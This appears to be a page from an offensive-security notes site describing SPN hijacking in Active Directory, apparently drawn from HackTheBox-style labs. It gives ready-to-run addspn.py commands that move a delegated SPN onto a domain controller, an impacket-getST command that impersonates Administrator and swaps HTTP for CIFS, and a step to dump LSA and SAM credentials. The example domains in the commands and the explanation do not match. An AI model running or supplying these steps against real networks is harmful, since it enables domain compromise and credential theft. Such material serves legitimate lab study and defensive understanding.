search
DiscordHackTheBoxTryHackMeGitHub

WriteSPN

hashtag
Deleting SPN

python3 /usr/share/krbrelayx/addspn.py -u 'militech.local\s.reed_adm' -p 'P@ssw0rd' -t 'WEB01$' -s 'HTTP/WEB01.militech.local' -r 13.13.13.13

hashtag
Adding SPN

python3 /usr/share/krbrelayx/addspn.py -u 'militech.local\s.reed_adm' -p 'P@ssw0rd' -T samname -t 'DC01$' -s 'HTTP/WEB01.militech.local' 13.13.13.13

hashtag
SPN Hijacking

If an attacker controls an account configured with Constrained Delegation to a specific SPN, and possesses WriteSPN privileges over a high-value target (like a Domain Controller), the delegation path can be hijacked.

By removing the allowed SPN from its original host and registering it to the high-value target, the KDC is forced to encrypt the delegated Service Ticket using the high-value target's password hash. Because the Service Name (sname) in the ticket header is not cryptographically protected by the KDC signature, it can be arbitrarily altered (e.g., changing HTTP to CIFS) before being presented to the target service.

hashtag
Service Name(sname) Substitution

So after we switched owner of the service now the only thing we need is to change service from HTTP to CIFS, which would get us full access to files system (which we can use to dump LSA, SAM etc.)

impacket-getST MILITECH.LOCAL/s.reed_adm:'P@ssw0rd' -spn HTTP/WEB01.militech.local -impersonate Administrator -dc-ip DC01.militech.local -altservice CIFS/DC01.militech.local

  • PIRATE.HTB/a.white_adm:'P@ssw0rd': The compromised account holding Constrained Delegation rights.

  • -spn HTTP/WEB01.pirate.htb: The hijacked SPN that is now registered to the target DC.

  • -impersonate Administrator: The privileged user being impersonated via S4U2Self and S4U2Proxy.

  • -altservice CIFS/DC01.pirate.htb: Alters the unencrypted sname field in the ticket from HTTP to CIFS.

hashtag
DUMP

Then we can use nxc -lsa and -sam features to dump new creds with using admins's key:

PreviousReadGMSAPasswordNextTrust Abuse

Last updated